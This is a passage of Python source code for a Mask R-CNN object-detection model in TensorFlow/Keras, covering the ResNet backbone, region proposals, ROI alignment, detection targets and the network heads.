Boolean. If False, stage5 of the network is not created train_bn: Boolean. Train or freeze Batch Norm layers """ assert architecture in ["resnet50", "resnet101"] # Stage 1 x = KL.ZeroPadding2D((3, 3))(input_image) x = KL.Conv2D(64, (7, 7), strides=(2, 2), name='conv1', use_bias=True)(x) x = BatchNorm(name='bn_conv1')(x, training=train_bn) x = KL.Activation('relu')(x) C1 = x = KL.MaxPooling2D((3, 3), strides=(2, 2), padding="same")(x) # Stage 2 x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), train_bn=train_bn) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', train_bn=train_bn) C2 = x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', train_bn=train_bn) # Stage 3 x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', train_bn=train_bn) x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', train_bn=train_bn) x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', train_bn=train_bn) C3 = x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', train_bn=train_bn) # Stage 4 x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', train_bn=train_bn) block_count = {"resnet50": 5, "resnet101": 22}[architecture] for i in range(block_count): x = identity_block(x, 3, [256, 256, 1024], stage=4, block=chr(98 + i), train_bn=train_bn) C4 = x # Stage 5 if stage5: x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', train_bn=train_bn) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', train_bn=train_bn) C5 = x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', train_bn=train_bn) else: C5 = None return [C1, C2, C3, C4, C5] ############################################################ # Proposal Layer ############################################################ def apply_box_deltas_graph(boxes, deltas): """Applies the given deltas to the given boxes. 
boxes: [N, (y1, x1, y2, x2)] boxes to update deltas: [N, (dy, dx, log(dh), log(dw))] refinements to apply """ # Convert to y, x, h, w height = boxes[:, 2] - boxes[:, 0] width = boxes[:, 3] - boxes[:, 1] center_y = boxes[:, 0] + 0.5 * height center_x = boxes[:, 1] + 0.5 * width # Apply deltas center_y += deltas[:, 0] * height center_x += deltas[:, 1] * width height *= tf.exp(deltas[:, 2]) width *= tf.exp(deltas[:, 3]) # Convert back to y1, x1, y2, x2 y1 = center_y - 0.5 * height x1 = center_x - 0.5 * width y2 = y1 + height x2 = x1 + width result = tf.stack([y1, x1, y2, x2], axis=1, name="apply_box_deltas_out") return result def clip_boxes_graph(boxes, window): """ boxes: [N, (y1, x1, y2, x2)] window: [4] in the form y1, x1, y2, x2 """ # Split wy1, wx1, wy2, wx2 = tf.split(window, 4) y1, x1, y2, x2 = tf.split(boxes, 4, axis=1) # Clip y1 = tf.maximum(tf.minimum(y1, wy2), wy1) x1 = tf.maximum(tf.minimum(x1, wx2), wx1) y2 = tf.maximum(tf.minimum(y2, wy2), wy1) x2 = tf.maximum(tf.minimum(x2, wx2), wx1) clipped = tf.concat([y1, x1, y2, x2], axis=1, name="clipped_boxes") clipped.set_shape((clipped.shape[0], 4)) return clipped class ProposalLayer(KE.Layer): """Receives anchor scores and selects a subset to pass as proposals to the second stage. Filtering is done based on anchor scores and non-max suppression to remove overlaps. It also applies bounding box refinement deltas to anchors. Inputs: rpn_probs: [batch, num_anchors, (bg prob, fg prob)] rpn_bbox: [batch, num_anchors, (dy, dx, log(dh), log(dw))] anchors: [batch, num_anchors, (y1, x1, y2, x2)] anchors in normalized coordinates Returns: Proposals in normalized coordinates [batch, rois, (y1, x1, y2, x2)] """ def __init__(self, proposal_count, nms_threshold, config=None, **kwargs): super(ProposalLayer, self).__init__(**kwargs) self.config = config self.proposal_count = proposal_count self.nms_threshold = nms_threshold def call(self, inputs): # Box Scores. Use the foreground class confidence. [Batch, num_rois, 1] scores = inputs[0][:, :, 1] # Box deltas [batch, num_rois, 4] deltas = inputs[1] deltas = deltas * np.reshape(self.config.RPN_BBOX_STD_DEV, [1, 1, 4]) # Anchors anchors = inputs[2] # Improve performance by trimming to top anchors by score # and doing the rest on the smaller subset. pre_nms_limit = tf.minimum(self.config.PRE_NMS_LIMIT, tf.shape(anchors)[1]) ix = tf.nn.top_k(scores, pre_nms_limit, sorted=True, name="top_anchors").indices scores = utils.batch_slice([scores, ix], lambda x, y: tf.gather(x, y), self.config.IMAGES_PER_GPU) deltas = utils.batch_slice([deltas, ix], lambda x, y: tf.gather(x, y), self.config.IMAGES_PER_GPU) pre_nms_anchors = utils.batch_slice([anchors, ix], lambda a, x: tf.gather(a, x), self.config.IMAGES_PER_GPU, names=["pre_nms_anchors"]) # Apply deltas to anchors to get refined anchors. # [batch, N, (y1, x1, y2, x2)] boxes = utils.batch_slice([pre_nms_anchors, deltas], lambda x, y: apply_box_deltas_graph(x, y), self.config.IMAGES_PER_GPU, names=["refined_anchors"]) # Clip to image boundaries. Since we're in normalized coordinates, # clip to 0..1 range. [batch, N, (y1, x1, y2, x2)] window = np.array([0, 0, 1, 1], dtype=np.float32) boxes = utils.batch_slice(boxes, lambda x: clip_boxes_graph(x, window), self.config.IMAGES_PER_GPU, names=["refined_anchors_clipped"]) # Filter out small boxes # According to Xinlei Chen's paper, this reduces detection accuracy # for small objects, so we're skipping it. 
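        # A minimal per-image sketch of such a filter, kept only as a
        # commented-out illustration (the `min_area` threshold is
        # hypothetical and would be in normalized coordinates):
        #
        #   y1, x1, y2, x2 = tf.split(single_image_boxes, 4, axis=1)
        #   areas = tf.squeeze((y2 - y1) * (x2 - x1), 1)
        #   keep_ix = tf.where(areas >= min_area)[:, 0]
        #   single_image_boxes = tf.gather(single_image_boxes, keep_ix)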
# Non-max suppression def nms(boxes, scores): indices = tf.image.non_max_suppression( boxes, scores, self.proposal_count, self.nms_threshold, name="rpn_non_max_suppression") proposals = tf.gather(boxes, indices) # Pad if needed padding = tf.maximum(self.proposal_count - tf.shape(proposals)[0], 0) proposals = tf.pad(proposals, [(0, padding), (0, 0)]) return proposals proposals = utils.batch_slice([boxes, scores], nms, self.config.IMAGES_PER_GPU) return proposals def compute_output_shape(self, input_shape): return (None, self.proposal_count, 4) ############################################################ # ROIAlign Layer ############################################################ def log2_graph(x): """Implementation of Log2. TF doesn't have a native implementation.""" return tf.log(x) / tf.log(2.0) class PyramidROIAlign(KE.Layer): """Implements ROI Pooling on multiple levels of the feature pyramid. Params: - pool_shape: [pool_height, pool_width] of the output pooled regions. Usually [7, 7] Inputs: - boxes: [batch, num_boxes, (y1, x1, y2, x2)] in normalized coordinates. Possibly padded with zeros if not enough boxes to fill the array. - image_meta: [batch, (meta data)] Image details. See compose_image_meta() - feature_maps: List of feature maps from different levels of the pyramid. Each is [batch, height, width, channels] Output: Pooled regions in the shape: [batch, num_boxes, pool_height, pool_width, channels]. The width and height are those specific in the pool_shape in the layer constructor. """ def __init__(self, pool_shape, **kwargs): super(PyramidROIAlign, self).__init__(**kwargs) self.pool_shape = tuple(pool_shape) def call(self, inputs): # Crop boxes [batch, num_boxes, (y1, x1, y2, x2)] in normalized coords boxes = inputs[0] # Image meta # Holds details about the image. See compose_image_meta() image_meta = inputs[1] # Feature Maps. List of feature maps from different level of the # feature pyramid. Each is [batch, height, width, channels] feature_maps = inputs[2:] # Assign each ROI to a level in the pyramid based on the ROI area. y1, x1, y2, x2 = tf.split(boxes, 4, axis=2) h = y2 - y1 w = x2 - x1 # Use shape of first image. Images in a batch must have the same size. image_shape = parse_image_meta_graph(image_meta)['image_shape'][0] # Equation 1 in the Feature Pyramid Networks paper. Account for # the fact that our coordinates are normalized here. # e.g. a 224x224 ROI (in pixels) maps to P4 image_area = tf.cast(image_shape[0] * image_shape[1], tf.float32) roi_level = log2_graph(tf.sqrt(h * w) / (224.0 / tf.sqrt(image_area))) roi_level = tf.minimum(5, tf.maximum( 2, 4 + tf.cast(tf.round(roi_level), tf.int32))) roi_level = tf.squeeze(roi_level, 2) # Loop through levels and apply ROI pooling to each. P2 to P5. pooled = [] box_to_level = [] for i, level in enumerate(range(2, 6)): ix = tf.where(tf.equal(roi_level, level)) level_boxes = tf.gather_nd(boxes, ix) # Box indices for crop_and_resize. box_indices = tf.cast(ix[:, 0], tf.int32) # Keep track of which box is mapped to which level box_to_level.append(ix) # Stop gradient propogation to ROI proposals level_boxes = tf.stop_gradient(level_boxes) box_indices = tf.stop_gradient(box_indices) # Crop and Resize # From Mask R-CNN paper: "We sample four regular locations, so # that we can evaluate either max or average pooling. In fact, # interpolating only a single value at each bin center (without # pooling) is nearly as effective." 
# # Here we use the simplified approach of a single value per bin, # which is how it's done in tf.crop_and_resize() # Result: [batch * num_boxes, pool_height, pool_width, channels] pooled.append(tf.image.crop_and_resize( feature_maps[i], level_boxes, box_indices, self.pool_shape, method="bilinear")) # Pack pooled features into one tensor pooled = tf.concat(pooled, axis=0) # Pack box_to_level mapping into one array and add another # column representing the order of pooled boxes box_to_level = tf.concat(box_to_level, axis=0) box_range = tf.expand_dims(tf.range(tf.shape(box_to_level)[0]), 1) box_to_level = tf.concat([tf.cast(box_to_level, tf.int32), box_range], axis=1) # Rearrange pooled features to match the order of the original boxes # Sort box_to_level by batch then box index # TF doesn't have a way to sort by two columns, so merge them and sort. sorting_tensor = box_to_level[:, 0] * 100000 + box_to_level[:, 1] ix = tf.nn.top_k(sorting_tensor, k=tf.shape( box_to_level)[0]).indices[::-1] ix = tf.gather(box_to_level[:, 2], ix) pooled = tf.gather(pooled, ix) # Re-add the batch dimension shape = tf.concat([tf.shape(boxes)[:2], tf.shape(pooled)[1:]], axis=0) pooled = tf.reshape(pooled, shape) return pooled def compute_output_shape(self, input_shape): return input_shape[0][:2] + self.pool_shape + (input_shape[2][-1], ) ############################################################ # Detection Target Layer ############################################################ def overlaps_graph(boxes1, boxes2): """Computes IoU overlaps between two sets of boxes. boxes1, boxes2: [N, (y1, x1, y2, x2)]. """ # 1. Tile boxes2 and repeat boxes1. This allows us to compare # every boxes1 against every boxes2 without loops. # TF doesn't have an equivalent to np.repeat() so simulate it # using tf.tile() and tf.reshape. b1 = tf.reshape(tf.tile(tf.expand_dims(boxes1, 1), [1, 1, tf.shape(boxes2)[0]]), [-1, 4]) b2 = tf.tile(boxes2, [tf.shape(boxes1)[0], 1]) # 2. Compute intersections b1_y1, b1_x1, b1_y2, b1_x2 = tf.split(b1, 4, axis=1) b2_y1, b2_x1, b2_y2, b2_x2 = tf.split(b2, 4, axis=1) y1 = tf.maximum(b1_y1, b2_y1) x1 = tf.maximum(b1_x1, b2_x1) y2 = tf.minimum(b1_y2, b2_y2) x2 = tf.minimum(b1_x2, b2_x2) intersection = tf.maximum(x2 - x1, 0) * tf.maximum(y2 - y1, 0) # 3. Compute unions b1_area = (b1_y2 - b1_y1) * (b1_x2 - b1_x1) b2_area = (b2_y2 - b2_y1) * (b2_x2 - b2_x1) union = b1_area + b2_area - intersection # 4. Compute IoU and reshape to [boxes1, boxes2] iou = intersection / union overlaps = tf.reshape(iou, [tf.shape(boxes1)[0], tf.shape(boxes2)[0]]) return overlaps def detection_targets_graph(proposals, gt_class_ids, gt_boxes, gt_masks, config): """Generates detection targets for one image. Subsamples proposals and generates target class IDs, bounding box deltas, and masks for each. Inputs: proposals: [POST_NMS_ROIS_TRAINING, (y1, x1, y2, x2)] in normalized coordinates. Might be zero padded if there are not enough proposals. gt_class_ids: [MAX_GT_INSTANCES] int class IDs gt_boxes: [MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates. gt_masks: [height, width, MAX_GT_INSTANCES] of boolean type. Returns: Target ROIs and corresponding class IDs, bounding box shifts, and masks. rois: [TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates class_ids: [TRAIN_ROIS_PER_IMAGE]. Integer class IDs. Zero padded. deltas: [TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw))] masks: [TRAIN_ROIS_PER_IMAGE, height, width]. Masks cropped to bbox boundaries and resized to neural network output size. 
Note: Returned arrays might be zero padded if not enough target ROIs. """ # Assertions asserts = [ tf.Assert(tf.greater(tf.shape(proposals)[0], 0), [proposals], name="roi_assertion"), ] with tf.control_dependencies(asserts): proposals = tf.identity(proposals) # Remove zero padding proposals, _ = trim_zeros_graph(proposals, name="trim_proposals") gt_boxes, non_zeros = trim_zeros_graph(gt_boxes, name="trim_gt_boxes") gt_class_ids = tf.boolean_mask(gt_class_ids, non_zeros, name="trim_gt_class_ids") gt_masks = tf.gather(gt_masks, tf.where(non_zeros)[:, 0], axis=2, name="trim_gt_masks") # Handle COCO crowds # A crowd box in COCO is a bounding box around several instances. Exclude # them from training. A crowd box is given a negative class ID. crowd_ix = tf.where(gt_class_ids < 0)[:, 0] non_crowd_ix = tf.where(gt_class_ids > 0)[:, 0] crowd_boxes = tf.gather(gt_boxes, crowd_ix) gt_class_ids = tf.gather(gt_class_ids, non_crowd_ix) gt_boxes = tf.gather(gt_boxes, non_crowd_ix) gt_masks = tf.gather(gt_masks, non_crowd_ix, axis=2) # Compute overlaps matrix [proposals, gt_boxes] overlaps = overlaps_graph(proposals, gt_boxes) # Compute overlaps with crowd boxes [proposals, crowd_boxes] crowd_overlaps = overlaps_graph(proposals, crowd_boxes) crowd_iou_max = tf.reduce_max(crowd_overlaps, axis=1) no_crowd_bool = (crowd_iou_max < 0.001) # Determine positive and negative ROIs roi_iou_max = tf.reduce_max(overlaps, axis=1) # 1. Positive ROIs are those with >= 0.5 IoU with a GT box positive_roi_bool = (roi_iou_max >= 0.5) positive_indices = tf.where(positive_roi_bool)[:, 0] # 2. Negative ROIs are those with < 0.5 with every GT box. Skip crowds. negative_indices = tf.where(tf.logical_and(roi_iou_max < 0.5, no_crowd_bool))[:, 0] # Subsample ROIs. Aim for 33% positive # Positive ROIs positive_count = int(config.TRAIN_ROIS_PER_IMAGE * config.ROI_POSITIVE_RATIO) positive_indices = tf.random_shuffle(positive_indices)[:positive_count] positive_count = tf.shape(positive_indices)[0] # Negative ROIs. Add enough to maintain positive:negative ratio. r = 1.0 / config.ROI_POSITIVE_RATIO negative_count = tf.cast(r * tf.cast(positive_count, tf.float32), tf.int32) - positive_count negative_indices = tf.random_shuffle(negative_indices)[:negative_count] # Gather selected ROIs positive_rois = tf.gather(proposals, positive_indices) negative_rois = tf.gather(proposals, negative_indices) # Assign positive ROIs to GT boxes. positive_overlaps = tf.gather(overlaps, positive_indices) roi_gt_box_assignment = tf.cond( tf.greater(tf.shape(positive_overlaps)[1], 0), true_fn = lambda: tf.argmax(positive_overlaps, axis=1), false_fn = lambda: tf.cast(tf.constant([]),tf.int64) ) roi_gt_boxes = tf.gather(gt_boxes, roi_gt_box_assignment) roi_gt_class_ids = tf.gather(gt_class_ids, roi_gt_box_assignment) # Compute bbox refinement for positive ROIs deltas = utils.box_refinement_graph(positive_rois, roi_gt_boxes) deltas /= config.BBOX_STD_DEV # Assign positive ROIs to GT masks # Permute masks to [N, height, width, 1] transposed_masks = tf.expand_dims(tf.transpose(gt_masks, [2, 0, 1]), -1) # Pick the right mask for each ROI roi_masks = tf.gather(transposed_masks, roi_gt_box_assignment) # Compute mask targets boxes = positive_rois if config.USE_MINI_MASK: # Transform ROI coordinates from normalized image space # to normalized mini-mask space. 
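        # Worked example with hypothetical values: if a GT box spans
        # y in [0.3, 0.7] (gt_h = 0.4) and a positive ROI has y1 = 0.4,
        # the transformed y1 below is (0.4 - 0.3) / 0.4 = 0.25. Coordinates
        # are re-expressed relative to the GT box because the mini mask
        # covers only the GT box, not the full image.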
y1, x1, y2, x2 = tf.split(positive_rois, 4, axis=1) gt_y1, gt_x1, gt_y2, gt_x2 = tf.split(roi_gt_boxes, 4, axis=1) gt_h = gt_y2 - gt_y1 gt_w = gt_x2 - gt_x1 y1 = (y1 - gt_y1) / gt_h x1 = (x1 - gt_x1) / gt_w y2 = (y2 - gt_y1) / gt_h x2 = (x2 - gt_x1) / gt_w boxes = tf.concat([y1, x1, y2, x2], 1) box_ids = tf.range(0, tf.shape(roi_masks)[0]) masks = tf.image.crop_and_resize(tf.cast(roi_masks, tf.float32), boxes, box_ids, config.MASK_SHAPE) # Remove the extra dimension from masks. masks = tf.squeeze(masks, axis=3) # Threshold mask pixels at 0.5 to have GT masks be 0 or 1 to use with # binary cross entropy loss. masks = tf.round(masks) # Append negative ROIs and pad bbox deltas and masks that # are not used for negative ROIs with zeros. rois = tf.concat([positive_rois, negative_rois], axis=0) N = tf.shape(negative_rois)[0] P = tf.maximum(config.TRAIN_ROIS_PER_IMAGE - tf.shape(rois)[0], 0) rois = tf.pad(rois, [(0, P), (0, 0)]) roi_gt_boxes = tf.pad(roi_gt_boxes, [(0, N + P), (0, 0)]) roi_gt_class_ids = tf.pad(roi_gt_class_ids, [(0, N + P)]) deltas = tf.pad(deltas, [(0, N + P), (0, 0)]) masks = tf.pad(masks, [[0, N + P], (0, 0), (0, 0)]) return rois, roi_gt_class_ids, deltas, masks class DetectionTargetLayer(KE.Layer): """Subsamples proposals and generates target box refinement, class_ids, and masks for each. Inputs: proposals: [batch, N, (y1, x1, y2, x2)] in normalized coordinates. Might be zero padded if there are not enough proposals. gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs. gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)] in normalized coordinates. gt_masks: [batch, height, width, MAX_GT_INSTANCES] of boolean type Returns: Target ROIs and corresponding class IDs, bounding box shifts, and masks. rois: [batch, TRAIN_ROIS_PER_IMAGE, (y1, x1, y2, x2)] in normalized coordinates target_class_ids: [batch, TRAIN_ROIS_PER_IMAGE]. Integer class IDs. target_deltas: [batch, TRAIN_ROIS_PER_IMAGE, (dy, dx, log(dh), log(dw)] target_mask: [batch, TRAIN_ROIS_PER_IMAGE, height, width] Masks cropped to bbox boundaries and resized to neural network output size. Note: Returned arrays might be zero padded if not enough target ROIs. """ def __init__(self, config, **kwargs): super(DetectionTargetLayer, self).__init__(**kwargs) self.config = config def call(self, inputs): proposals = inputs[0] gt_class_ids = inputs[1] gt_boxes = inputs[2] gt_masks = inputs[3] # Slice the batch and run a graph for each slice # TODO: Rename target_bbox to target_deltas for clarity names = ["rois", "target_class_ids", "target_bbox", "target_mask"] outputs = utils.batch_slice( [proposals, gt_class_ids, gt_boxes, gt_masks], lambda w, x, y, z: detection_targets_graph( w, x, y, z, self.config), self.config.IMAGES_PER_GPU, names=names) return outputs def compute_output_shape(self, input_shape): return [ (None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # rois (None, self.config.TRAIN_ROIS_PER_IMAGE), # class_ids (None, self.config.TRAIN_ROIS_PER_IMAGE, 4), # deltas (None, self.config.TRAIN_ROIS_PER_IMAGE, self.config.MASK_SHAPE[0], self.config.MASK_SHAPE[1]) # masks ] def compute_mask(self, inputs, mask=None): return [None, None, None, None] ############################################################ # Detection Layer ############################################################ def refine_detections_graph(rois, probs, deltas, window, config): """Refine classified proposals and filter overlaps and return final detections. Inputs: rois: [N, (y1, x1, y2, x2)] in normalized coordinates probs: [N, num_classes]. 
Class probabilities. deltas: [N, num_classes, (dy, dx, log(dh), log(dw))]. Class-specific bounding box deltas. window: (y1, x1, y2, x2) in normalized coordinates. The part of the image that contains the image excluding the padding. Returns detections shaped: [num_detections, (y1, x1, y2, x2, class_id, score)] where coordinates are normalized. """ # Class IDs per ROI class_ids = tf.argmax(probs, axis=1, output_type=tf.int32) # Class probability of the top class of each ROI indices = tf.stack([tf.range(probs.shape[0]), class_ids], axis=1) class_scores = tf.gather_nd(probs, indices) # Class-specific bounding box deltas deltas_specific = tf.gather_nd(deltas, indices) # Apply bounding box deltas # Shape: [boxes, (y1, x1, y2, x2)] in normalized coordinates refined_rois = apply_box_deltas_graph( rois, deltas_specific * config.BBOX_STD_DEV) # Clip boxes to image window refined_rois = clip_boxes_graph(refined_rois, window) # TODO: Filter out boxes with zero area # Filter out background boxes keep = tf.where(class_ids > 0)[:, 0] # Filter out low confidence boxes if config.DETECTION_MIN_CONFIDENCE: conf_keep = tf.where(class_scores >= config.DETECTION_MIN_CONFIDENCE)[:, 0] keep = tf.sets.set_intersection(tf.expand_dims(keep, 0), tf.expand_dims(conf_keep, 0)) keep = tf.sparse_tensor_to_dense(keep)[0] # Apply per-class NMS # 1. Prepare variables pre_nms_class_ids = tf.gather(class_ids, keep) pre_nms_scores = tf.gather(class_scores, keep) pre_nms_rois = tf.gather(refined_rois, keep) unique_pre_nms_class_ids = tf.unique(pre_nms_class_ids)[0] def nms_keep_map(class_id): """Apply Non-Maximum Suppression on ROIs of the given class.""" # Indices of ROIs of the given class ixs = tf.where(tf.equal(pre_nms_class_ids, class_id))[:, 0] # Apply NMS class_keep = tf.image.non_max_suppression( tf.gather(pre_nms_rois, ixs), tf.gather(pre_nms_scores, ixs), max_output_size=config.DETECTION_MAX_INSTANCES, iou_threshold=config.DETECTION_NMS_THRESHOLD) # Map indices class_keep = tf.gather(keep, tf.gather(ixs, class_keep)) # Pad with -1 so returned tensors have the same shape gap = config.DETECTION_MAX_INSTANCES - tf.shape(class_keep)[0] class_keep = tf.pad(class_keep, [(0, gap)], mode='CONSTANT', constant_values=-1) # Set shape so map_fn() can infer result shape class_keep.set_shape([config.DETECTION_MAX_INSTANCES]) return class_keep # 2. Map over class IDs nms_keep = tf.map_fn(nms_keep_map, unique_pre_nms_class_ids, dtype=tf.int64) # 3. Merge results into one list, and remove -1 padding nms_keep = tf.reshape(nms_keep, [-1]) nms_keep = tf.gather(nms_keep, tf.where(nms_keep > -1)[:, 0]) # 4. Compute intersection between keep and nms_keep keep = tf.sets.set_intersection(tf.expand_dims(keep, 0), tf.expand_dims(nms_keep, 0)) keep = tf.sparse_tensor_to_dense(keep)[0] # Keep top detections roi_count = config.DETECTION_MAX_INSTANCES class_scores_keep = tf.gather(class_scores, keep) num_keep = tf.minimum(tf.shape(class_scores_keep)[0], roi_count) top_ids = tf.nn.top_k(class_scores_keep, k=num_keep, sorted=True)[1] keep = tf.gather(keep, top_ids) # Arrange output as [N, (y1, x1, y2, x2, class_id, score)] # Coordinates are normalized. 
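    # A single row of the tensor built below could look like (hypothetical
    # values): [0.12, 0.34, 0.56, 0.78, 17.0, 0.93], i.e. the refined box
    # in normalized coordinates, the class ID cast to float, and the class
    # confidence score.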
detections = tf.concat([ tf.gather(refined_rois, keep), tf.to_float(tf.gather(class_ids, keep))[..., tf.newaxis], tf.gather(class_scores, keep)[..., tf.newaxis] ], axis=1) # Pad with zeros if detections < DETECTION_MAX_INSTANCES gap = config.DETECTION_MAX_INSTANCES - tf.shape(detections)[0] detections = tf.pad(detections, [(0, gap), (0, 0)], "CONSTANT") return detections class DetectionLayer(KE.Layer): """Takes classified proposal boxes and their bounding box deltas and returns the final detection boxes. Returns: [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] where coordinates are normalized. """ def __init__(self, config=None, **kwargs): super(DetectionLayer, self).__init__(**kwargs) self.config = config def call(self, inputs): rois = inputs[0] mrcnn_class = inputs[1] mrcnn_bbox = inputs[2] image_meta = inputs[3] # Get windows of images in normalized coordinates. Windows are the area # in the image that excludes the padding. # Use the shape of the first image in the batch to normalize the window # because we know that all images get resized to the same size. m = parse_image_meta_graph(image_meta) image_shape = m['image_shape'][0] window = norm_boxes_graph(m['window'], image_shape[:2]) # Run detection refinement graph on each item in the batch detections_batch = utils.batch_slice( [rois, mrcnn_class, mrcnn_bbox, window], lambda x, y, w, z: refine_detections_graph(x, y, w, z, self.config), self.config.IMAGES_PER_GPU) # Reshape output # [batch, num_detections, (y1, x1, y2, x2, class_id, class_score)] in # normalized coordinates return tf.reshape( detections_batch, [self.config.BATCH_SIZE, self.config.DETECTION_MAX_INSTANCES, 6]) def compute_output_shape(self, input_shape): return (None, self.config.DETECTION_MAX_INSTANCES, 6) ############################################################ # Region Proposal Network (RPN) ############################################################ def rpn_graph(feature_map, anchors_per_location, anchor_stride): """Builds the computation graph of Region Proposal Network. feature_map: backbone features [batch, height, width, depth] anchors_per_location: number of anchors per pixel in the feature map anchor_stride: Controls the density of anchors. Typically 1 (anchors for every pixel in the feature map), or 2 (every other pixel). Returns: rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax) rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities. rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be applied to anchors. """ # TODO: check if stride of 2 causes alignment issues if the feature map # is not even. # Shared convolutional base of the RPN shared = KL.Conv2D(512, (3, 3), padding='same', activation='relu', strides=anchor_stride, name='rpn_conv_shared')(feature_map) # Anchor Score. [batch, height, width, anchors per location * 2]. x = KL.Conv2D(2 * anchors_per_location, (1, 1), padding='valid', activation='linear', name='rpn_class_raw')(shared) # Reshape to [batch, anchors, 2] rpn_class_logits = KL.Lambda( lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 2]))(x) # Softmax on last dimension of BG/FG. rpn_probs = KL.Activation( "softmax", name="rpn_class_xxx")(rpn_class_logits) # Bounding box refinement. 
[batch, H, W, anchors per location * depth] # where depth is [x, y, log(w), log(h)] x = KL.Conv2D(anchors_per_location * 4, (1, 1), padding="valid", activation='linear', name='rpn_bbox_pred')(shared) # Reshape to [batch, anchors, 4] rpn_bbox = KL.Lambda(lambda t: tf.reshape(t, [tf.shape(t)[0], -1, 4]))(x) return [rpn_class_logits, rpn_probs, rpn_bbox] def build_rpn_model(anchor_stride, anchors_per_location, depth): """Builds a Keras model of the Region Proposal Network. It wraps the RPN graph so it can be used multiple times with shared weights. anchors_per_location: number of anchors per pixel in the feature map anchor_stride: Controls the density of anchors. Typically 1 (anchors for every pixel in the feature map), or 2 (every other pixel). depth: Depth of the backbone feature map. Returns a Keras Model object. The model outputs, when called, are: rpn_class_logits: [batch, H * W * anchors_per_location, 2] Anchor classifier logits (before softmax) rpn_probs: [batch, H * W * anchors_per_location, 2] Anchor classifier probabilities. rpn_bbox: [batch, H * W * anchors_per_location, (dy, dx, log(dh), log(dw))] Deltas to be applied to anchors. """ input_feature_map = KL.Input(shape=[None, None, depth], name="input_rpn_feature_map") outputs = rpn_graph(input_feature_map, anchors_per_location, anchor_stride) return KM.Model([input_feature_map], outputs, name="rpn_model") ############################################################ # Feature Pyramid Network Heads ############################################################ def fpn_classifier_graph(rois, feature_maps, image_meta, pool_size, num_classes, train_bn=True, fc_layers_size=1024): """Builds the computation graph of the feature pyramid network classifier and regressor heads. rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized coordinates. feature_maps: List of feature maps from different layers of the pyramid, [P2, P3, P4, P5]. Each has a different resolution. image_meta: [batch, (meta data)] Image details. See compose_image_meta() pool_size: The width of the square feature map generated from ROI Pooling. num_classes: number of classes, which determines the depth of the results train_bn: Boolean. 
Train or freeze Batch Norm layers fc_layers_size: Size of the 2 FC layers Returns: logits: [batch, num_rois, NUM_CLASSES] classifier logits (before softmax) probs: [batch, num_rois, NUM_CLASSES] classifier probabilities bbox_deltas: [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] Deltas to apply to proposal boxes """ # ROI Pooling # Shape: [batch, num_rois, POOL_SIZE, POOL_SIZE, channels] x = PyramidROIAlign([pool_size, pool_size], name="roi_align_classifier")([rois, image_meta] + feature_maps) # Two 1024 FC layers (implemented with Conv2D for consistency) x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (pool_size, pool_size), padding="valid"), name="mrcnn_class_conv1")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn1')(x, training=train_bn) x = KL.Activation('relu')(x) x = KL.TimeDistributed(KL.Conv2D(fc_layers_size, (1, 1)), name="mrcnn_class_conv2")(x) x = KL.TimeDistributed(BatchNorm(), name='mrcnn_class_bn2')(x, training=train_bn) x = KL.Activation('relu')(x) shared = KL.Lambda(lambda x: K.squeeze(K.squeeze(x, 3), 2), name="pool_squeeze")(x) # Classifier head mrcnn_class_logits = KL.TimeDistributed(KL.Dense(num_classes), name='mrcnn_class_logits')(shared) mrcnn_probs = KL.TimeDistributed(KL.Activation("softmax"), name="mrcnn_class")(mrcnn_class_logits) # BBox head # [batch, num_rois, NUM_CLASSES * (dy, dx, log(dh), log(dw))] x = KL.TimeDistributed(KL.Dense(num_classes * 4, activation='linear'), name='mrcnn_bbox_fc')(shared) # Reshape to [batch, num_rois, NUM_CLASSES, (dy, dx, log(dh), log(dw))] s = K.int_shape(x) mrcnn_bbox = KL.Reshape((s[1], num_classes, 4), name="mrcnn_bbox")(x) return mrcnn_class_logits, mrcnn_probs, mrcnn_bbox def build_fpn_mask_graph(rois, feature_maps, image_meta, pool_size, num_classes, train_bn=True): """Builds the computation graph of the mask head of Feature Pyramid Network. rois: [batch, num_rois, (y1, x1, y2, x2)] Proposal boxes in normalized coordinates. feature_maps: List of feature maps from different layers of the pyramid, [P2, P3, P4, P5]. Each has a different resolution. image_meta: [batch, (meta data)] Image details. See compose_image_meta() pool_size: The width of the square feature map generated from ROI Pooling. num_classes: number of classes, which determines the depth of the results train_bn: Boolean. 
